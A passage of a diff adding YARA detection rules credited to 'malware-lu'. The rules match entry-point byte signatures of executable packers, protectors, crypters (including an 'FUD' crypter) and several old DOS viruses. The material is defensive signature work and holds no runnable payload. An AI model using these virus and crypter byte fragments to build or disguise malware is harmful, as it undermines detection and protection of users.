+		$a0 = { 55 8B EC 83 C4 D0 53 56 57 8D 75 FC 8B 44 24 30 25 00 00 FF FF 81 38 4D 5A 90 00 74 07 2D 00 10 00 00 EB F1 89 45 FC E8 C8 FF FF FF 2D 0F 05 00 00 89 45 F4 8B 06 8B 40 3C 03 06 8B 40 78 03 06 8B C8 8B 51 20 03 16 8B 59 24 03 1E 89 5D F0 8B 59 1C 03 1E 89 5D EC 8B 41 18 8B C8 49 85 C9 72 5A 41 33 C0 8B D8 C1 E3 02 03 DA 8B 3B 03 3E 81 3F 47 65 74 50 75 40 8B DF 83 C3 04 81 3B 72 6F 63 41 75 33 8B DF 83 C3 08 81 3B 64 64 72 65 75 26 83 C7 0C 66 81 3F 73 73 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule InstallAnywhere61ZeroGSoftwareInc
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 BE 00 A0 42 00 8D BE 00 70 FD FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 03 72 0D C1 E0 }
+	$a1 = { 60 BE 00 A0 42 00 8D BE 00 70 FD FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule iLUCRYPTv4018exe
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B EC FA C7 ?? ?? ?? ?? 4C 4C C3 FB BF ?? ?? B8 ?? ?? 2E ?? ?? D1 C8 4F 81 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02ASProtectAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EncryptPEV22006710WFS
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C 64 FF 35 00 00 00 00 E8 73 01 00 00 }
+	$a1 = { 60 9C 64 FF 35 00 00 00 00 E8 73 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 54 65 6D 70 50 61 74 68 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule Themida10xx18xxnocompressionOreansTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 D8 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8B DA C7 45 D8 00 00 00 00 8B 45 D8 40 89 45 D8 81 7D D8 80 00 00 00 74 0F 8B 45 08 89 83 ?? ?? ?? ?? FF 45 08 43 EB E1 89 45 DC 61 8B 45 DC C9 C2 04 00 55 8B EC 81 C4 7C FF FF FF 60 E8 00 00 00 00 }
+	$a1 = { 55 8B EC 83 C4 D8 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8B DA C7 45 D8 00 00 00 00 8B 45 D8 40 89 45 D8 81 7D D8 80 00 00 00 74 0F 8B 45 08 89 83 ?? ?? ?? ?? FF 45 08 43 EB E1 89 45 DC 61 8B 45 DC C9 C2 04 00 55 8B EC 81 C4 7C FF FF FF 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8D 45 80 8B 5D 08 C7 85 7C FF FF FF 00 00 00 00 8B 8D 7C FF FF FF D1 C3 88 18 41 89 8D 7C FF FF FF 81 BD 7C FF FF FF 80 00 00 00 75 E3 C7 85 7C FF FF FF 00 00 00 00 8D BA ?? ?? ?? ?? 8D 75 80 8A 0E BB F4 01 00 00 B8 AB 37 54 78 D3 D0 8A 0F D3 D0 4B 75 F7 0F AF C3 47 46 8B 8D 7C FF FF FF 41 89 8D 7C FF FF FF 81 F9 80 00 00 00 75 D1 61 C9 C2 04 00 55 8B EC 83 C4 F0 8B 75 08 C7 45 FC 00 00 00 00 EB 04 FF 45 FC 46 80 3E 00 75 F7 BA 00 00 00 00 8B 75 08 8B 7D 0C EB 7F C7 45 F8 00 00 00 00 EB }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule StonesPEEncryptorv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 57 56 52 51 53 E8 ?? ?? ?? ?? 5D 8B D5 81 ED 63 3A 40 ?? 2B 95 C2 3A 40 ?? 83 EA 0B 89 95 CB 3A 40 ?? 8D B5 CA 3A 40 ?? 0F B6 36 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PolyBoxDAnskya
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 33 C9 51 51 51 51 51 53 33 C0 55 68 84 2C 40 00 64 FF 30 64 89 20 C6 45 FF 00 B8 B8 46 40 00 BA 24 00 00 00 E8 8C F3 FF FF 6A 24 BA B8 46 40 00 8B 0D B0 46 40 00 A1 94 46 40 00 E8 71 FB FF FF 84 C0 0F 84 6E 01 00 00 8B 1D D0 46 40 00 8B C3 83 C0 24 03 05 D8 46 40 00 3B 05 B4 46 40 00 0F 85 51 01 00 00 8D 45 F4 BA B8 46 40 00 B9 10 00 00 00 E8 A2 EC FF FF 8B 45 F4 BA 9C 2C 40 00 E8 F1 ED FF FF }
+
+condition:
+		$a0
+}
+	
+	
+rule Mew10execoder10NorthfoxHCC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 33 C0 E9 ?? ?? FF FF 6A ?? ?? ?? ?? ?? 70 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECrypt102
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 5B 83 EB 05 EB 04 52 4E 44 21 85 C0 73 02 F7 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DIETv100d
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FC 06 1E 0E 8C C8 01 ?? ?? ?? BA ?? ?? 03 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackV119LZMA430ap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 83 7C 24 28 01 75 0C 8B 44 24 24 89 85 49 0B 00 00 EB 0C 8B 85 45 0B 00 00 89 85 49 0B 00 00 8D B5 6D 0B 00 00 8D 9D 2F 03 00 00 33 FF 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 DA 0A 00 00 89 85 41 0B 00 00 E8 76 01 00 00 EB 20 60 8B 85 49 0B 00 00 FF B5 41 0B 00 00 FF 34 37 01 04 24 FF 74 37 04 01 04 24 FF D3 61 83 C7 08 83 3C 37 00 75 DA 83 BD 55 0B 00 00 00 74 0E 83 BD 59 0B 00 00 00 74 05 E8 D7 01 00 00 8D 74 37 04 53 6A 40 68 00 10 00 00 68 ?? ?? ?? ?? 6A 00 FF 95 DA 0A 00 00 89 85 69 0B 00 00 5B 60 FF B5 41 0B 00 00 56 FF B5 69 0B 00 00 FF D3 61 8B B5 69 0B 00 00 8B C6 EB 01 40 80 38 01 75 FA 40 8B 38 03 BD 49 0B 00 00 83 C0 04 89 85 65 0B 00 00 E9 98 00 00 00 56 FF 95 D2 0A 00 00 89 85 61 0B 00 00 85 C0 0F 84 C8 00 00 00 8B C6 EB 5F 8B 85 65 0B 00 00 8B 00 A9 00 00 00 80 74 14 35 00 00 00 80 50 8B 85 65 0B 00 00 C7 00 20 20 20 00 EB 06 FF B5 65 0B 00 00 FF B5 61 0B 00 00 FF 95 D6 0A 00 00 85 C0 0F 84 87 00 00 00 89 07 83 C7 04 8B 85 65 0B 00 00 EB 01 40 80 38 00 75 FA 40 89 85 65 0B 00 00 66 81 78 02 00 80 74 A1 80 38 00 75 9C EB 01 46 80 3E 00 75 FA 46 40 8B 38 03 BD 49 0B 00 00 83 C0 04 89 85 65 0B 00 00 80 3E 01 0F 85 5F FF FF FF 68 00 40 00 00 68 ?? ?? ?? ?? FF B5 69 0B 00 00 FF 95 DE 0A 00 00 68 00 40 00 00 68 00 20 0C 00 FF B5 41 0B 00 00 FF 95 DE 0A 00 00 E8 3D 00 00 00 E8 24 01 00 00 61 E9 ?? ?? ?? ?? 61 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ENIGMAProtectorV112SukhovVladimir
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 83 C5 FA 81 ED ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 EB 02 FF 35 60 E8 24 00 00 00 00 00 FF EB 02 CD 20 8B 44 24 0C 83 80 B8 00 00 00 03 31 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakeASPack212FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MacromediaWindowsFlashProjectorPlayerv50
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 44 56 FF 15 70 61 44 00 8B F0 8A 06 3C 22 75 1C 8A 46 01 46 3C 22 74 0C 84 C0 74 08 8A 46 01 46 3C 22 75 F4 80 3E 22 75 0F 46 EB 0C 3C 20 7E 08 8A 46 01 46 3C 20 7F F8 8A 06 84 C0 74 0C 3C 20 7F 08 8A 46 01 46 84 C0 75 F4 8D 44 24 04 C7 44 24 30 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule IDApplicationProtector12IDSecuritySuite
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED F2 0B 47 00 B9 19 22 47 00 81 E9 EA 0E 47 00 89 EA 81 C2 EA 0E 47 00 8D 3A 89 FE 31 C0 E9 D3 02 00 00 CC CC CC CC E9 CA 02 00 00 43 3A 5C 57 69 6E 64 6F 77 73 5C 53 6F 66 74 57 61 72 65 50 72 6F 74 65 63 74 6F 72 5C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPACKv305c4ExtractablePasswordchecking
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 03 05 80 1A B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule HASPHLProtectionV1XAladdin
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 53 56 57 60 8B C4 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? 00 74 15 8B 0D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 C4 04 E9 A5 00 00 00 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 }
+	$a1 = { 55 8B EC 53 56 57 60 8B C4 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? 00 74 15 8B 0D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 C4 04 E9 A5 00 00 00 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B 15 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule ASProtectv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 01 ?? ?? ?? 90 5D 81 ED ?? ?? ?? ?? BB ?? ?? ?? ?? 03 DD 2B 9D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASProtectv11
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E9 ?? 04 ?? ?? E9 ?? ?? ?? ?? ?? ?? ?? EE }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov275a
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 68 ?? ?? ?? 68 D0 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 28 ?? ?? ?? 33 D2 8A D4 89 15 24 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner0132Lite003Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 06 FC 1E 07 BE 90 90 90 90 6A 04 68 90 10 90 90 68 ?? ?? ?? ?? E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxDoom666
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? ?? 5E 83 EE ?? B8 CF 7B CD 21 3D CF 7B ?? ?? 0E 1F 81 C6 ?? ?? BF ?? ?? B9 ?? ?? FC F3 A4 06 1F 06 B8 ?? ?? 50 CB B4 48 BB 2C 00 CD 21 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxSpanz
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 5E 81 EE ?? ?? 8D 94 ?? ?? B4 1A CD 21 C7 84 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule BeRoEXEPackerv100DLLLZBRSBeRoFarbrausch
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 BE ?? ?? ?? ?? BF ?? ?? ?? ?? FC AD 8D 1C 07 B0 80 3B FB 73 3B E8 ?? ?? ?? ?? 72 03 A4 EB F2 E8 ?? ?? ?? ?? 8D 51 FF E8 ?? ?? ?? ?? 56 8B F7 2B F2 F3 A4 5E EB DB 02 C0 75 03 AC 12 C0 C3 33 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Pksmart10b
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BA ?? ?? 8C C8 8B C8 03 C2 81 ?? ?? ?? 51 B9 ?? ?? 51 1E 8C D3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PELockv106
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 4B 45 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule LaunchAnywherev4001
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 53 83 EC 48 55 B8 FF FF FF FF 50 50 68 E0 3E 42 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 68 C0 69 44 00 E8 E4 80 FF FF 59 E8 4E 29 00 00 E8 C9 0D 00 00 85 C0 75 08 6A FF E8 6E 2B 00 00 59 E8 A8 2C 00 00 E8 23 2E 00 00 FF 15 4C C2 44 00 89 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv033v034BetaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 59 F3 A5 83 C8 FF 8B DF AB 40 AB 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule GameGuardnProtect
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 31 FF 74 06 61 E9 4A 4D 50 30 5A BA 7D 00 00 00 80 7C 24 08 01 E9 00 00 00 00 60 BE ?? ?? ?? ?? 31 FF 74 06 61 E9 4A 4D 50 30 8D BE ?? ?? ?? ?? 31 C9 74 06 61 E9 4A 4D 50 30 B8 7D 00 00 00 39 C2 B8 4C 00 00 00 F7 D0 75 3F 64 A1 30 00 00 00 85 C0 78 23 8B 40 0C 8B 40 0C C7 40 20 00 10 00 00 64 A1 18 00 00 00 8B 40 30 0F B6 40 02 85 C0 75 16 E9 12 00 00 00 31 C0 64 A0 20 00 00 00 85 C0 75 05 E9 01 00 00 00 61 57 83 CD FF EB 0B 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule yodasProtectorV1032AshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8F 00 00 00 E8 03 00 00 00 EB 01 ?? E8 82 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B8 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AB 00 00 00 E8 03 00 00 00 EB 01 ?? 83 FB 55 E8 03 00 00 00 EB 01 ?? 75 2E E8 03 00 00 00 EB 01 ?? C3 60 E8 00 00 00 00 5D 81 ED 94 73 42 00 8B D5 81 C2 E3 73 42 00 52 E8 01 00 00 00 C3 C3 E8 03 00 00 00 EB 01 ?? E8 0E 00 00 00 E8 D1 FF FF FF C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 CC C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 4B CC C3 E8 03 00 00 00 EB 01 ?? 33 DB B9 BF A4 42 00 81 E9 8E 74 42 00 8B D5 81 C2 8E 74 42 00 8D 3A 8B F7 33 C0 E8 03 00 00 00 EB 01 ?? E8 17 00 00 00 90 90 90 E9 63 29 00 00 33 C0 64 FF 30 64 89 20 43 CC C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule nBinderv40
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5C 6E 62 34 5F 74 6D 70 5F 30 31 33 32 34 35 34 33 35 30 5C 00 00 00 00 00 00 00 00 00 E9 55 43 4C FF 01 1A 00 00 00 00 96 30 07 77 2C 61 0E EE BA 51 09 99 19 C4 6D 07 8F F4 6A 70 35 A5 63 E9 A3 95 64 9E 32 88 DB 0E A4 B8 DC 79 }
+
+condition:
+		$a0
+}
+	
+	
+rule AnslymFUDCrypter
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 53 56 B8 38 17 05 10 E8 5A 45 FB FF 33 C0 55 68 21 1C 05 10 64 FF 30 64 89 20 EB 08 FC FC FC FC FC FC 27 54 E8 85 4C FB FF 6A 00 E8 0E 47 FB FF 6A 0A E8 27 49 FB FF E8 EA 47 FB FF 6A 0A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EPExEPackV10EliteCodingGroup
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? FF 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SimplePack12build3009Method2bagie
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 4D 5A 90 EB 01 00 52 E9 86 01 00 00 50 45 00 00 4C 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 0F 03 0B 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0C 00 00 00 00 ?? ?? ?? 00 10 00 00 00 02 00 00 01 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule WinZip32bitSFXv6xmodule
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FF 15 ?? ?? ?? 00 B1 22 38 08 74 02 B1 20 40 80 38 00 74 10 38 08 74 06 40 80 38 00 75 F6 80 38 00 74 01 40 33 C9 ?? ?? ?? ?? FF 15 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxEinstein
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 42 CD 21 72 31 B9 6E 03 33 D2 B4 40 CD 21 72 19 3B C1 75 15 B8 00 42 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VideoLanClient
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 83 EC 08 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CrunchPEv10xx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 E8 ?? ?? ?? ?? 5D 83 ED 06 8B C5 55 60 89 AD ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 09 C6 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxTravJack883
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB ?? 9C 9E 26 ?? ?? 51 04 ?? 7D ?? 00 ?? 2E ?? ?? ?? ?? 8C C8 8E C0 8E D8 80 ?? ?? ?? ?? 74 ?? 8A ?? ?? ?? BB ?? ?? 8A ?? 32 C2 88 ?? FE C2 43 81 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RSCsProcessPatcherv151
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 00 20 40 00 E8 C3 01 00 00 80 38 00 74 0D 66 81 78 FE 22 20 75 02 EB 03 40 EB EE 8B F8 B8 04 60 40 00 68 C4 20 40 00 68 D4 20 40 00 6A 00 6A 00 6A 04 6A 00 6A 00 6A 00 57 50 E8 9F 01 00 00 85 C0 0F 84 39 01 00 00 BE 00 60 40 00 8B 06 A3 28 21 40 00 83 }
+
+condition:
+		$a0
+}
+	
+	
+rule kryptor9
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5E B9 ?? ?? ?? ?? 2B C0 02 04 0E D3 C0 49 79 F8 41 8D 7E 2C 33 46 ?? 66 B9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SecuPackv15
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 53 56 57 33 C0 89 45 F0 B8 CC 3A 40 ?? E8 E0 FC FF FF 33 C0 55 68 EA 3C 40 ?? 64 FF 30 64 89 20 6A ?? 68 80 ?? ?? ?? 6A 03 6A ?? 6A 01 ?? ?? ?? 80 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule kryptor5
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 03 ?? ?? ?? E9 EB 6C 58 40 FF E0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule kryptor6
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 03 ?? ?? ?? E9 EB 68 58 33 D2 74 02 E9 E9 40 42 75 02 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ACProtectV13Xrisco
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 50 E8 01 00 00 00 75 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PELockNTv202c
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 C7 85 1E EB 03 CD 20 EB EB 01 EB 9C EB 01 EB EB 02 CD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02MinGWGCC2xAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 E8 02 00 00 00 C9 C3 90 90 45 58 45 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FreeBASIC016b
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 83 EC 08 C7 04 24 01 00 00 00 FF 15 ?? ?? ?? 00 E8 88 FF FF FF 89 EC 31 C0 5D C3 89 F6 55 89 E5 83 EC 08 C7 04 24 02 00 00 00 FF 15 ?? ?? ?? 00 E8 68 FF FF FF 89 EC 31 C0 5D C3 89 F6 55 89 E5 83 EC 08 8B 45 08 89 04 24 FF 15 ?? ?? ?? 00 89 EC 5D C3 8D 76 00 8D BC 27 00 00 00 00 55 89 E5 83 EC 08 8B 45 08 89 04 24 FF 15 ?? ?? ?? 00 89 EC 5D C3 90 90 90 90 90 90 90 90 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RCryptorv16bv16cVaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B C7 03 04 24 2B C7 80 38 50 0F 85 1B 8B 1F FF 68 }
+	$a1 = { 8B C7 03 04 24 2B C7 80 38 50 0F 85 1B 8B 1F FF 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule FileShield
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 1E EB ?? 90 00 00 8B D8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SDC12SelfDecryptingBinaryGeneratorbyClaesMNyberg
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 83 EC 08 C7 04 24 01 00 00 00 FF 15 A0 91 40 00 E8 DB FE FF FF 55 89 E5 53 83 EC 14 8B 45 08 8B 00 8B 00 3D 91 00 00 C0 77 3B 3D 8D 00 00 C0 72 4B BB 01 00 00 00 C7 44 24 04 00 00 00 00 C7 04 24 08 00 00 00 E8 CE 24 00 00 83 F8 01 0F 84 C4 00 00 00 85 C0 0F 85 A9 00 00 00 31 C0 83 C4 14 5B 5D C2 04 00 3D 94 00 00 C0 74 56 3D 96 00 00 C0 74 1E 3D 93 00 00 C0 75 E1 EB B5 3D 05 00 00 C0 8D B4 26 00 00 00 00 74 43 3D 1D 00 00 C0 75 CA C7 44 24 04 00 00 00 00 C7 04 24 04 00 00 00 E8 73 24 00 00 83 F8 01 0F 84 99 00 00 00 85 C0 74 A9 C7 04 24 04 00 00 00 FF D0 B8 FF FF FF FF EB 9B 31 DB 8D 74 26 00 E9 69 FF FF FF C7 44 24 04 00 00 00 00 C7 04 24 0B 00 00 00 E8 37 24 00 00 83 F8 01 74 7F 85 C0 0F 84 6D FF FF FF C7 04 24 0B 00 00 00 8D 76 00 FF D0 B8 FF FF FF FF E9 59 FF FF FF C7 04 24 08 00 00 00 FF D0 B8 FF FF FF FF E9 46 FF FF FF C7 44 24 04 01 00 00 00 C7 04 24 08 00 00 00 E8 ED 23 00 00 B8 FF FF FF FF 85 DB 0F 84 25 FF FF FF E8 DB 15 00 00 B8 FF FF FF FF E9 16 FF FF FF C7 44 24 04 01 00 00 00 C7 04 24 04 00 00 00 E8 BD 23 00 00 B8 FF FF FF FF E9 F8 FE FF FF C7 44 24 04 01 00 00 00 C7 04 24 0B 00 00 00 E8 9F 23 00 00 B8 FF FF FF FF E9 DA FE FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PKLITEv1501
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 B8 ?? ?? BA ?? ?? 05 ?? ?? 3B 06 ?? ?? 72 ?? B4 ?? BA ?? ?? CD 21 B8 ?? ?? CD 21 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Inbuildv10hard
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B9 ?? ?? BB ?? ?? 2E ?? ?? 2E ?? ?? 43 E2 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
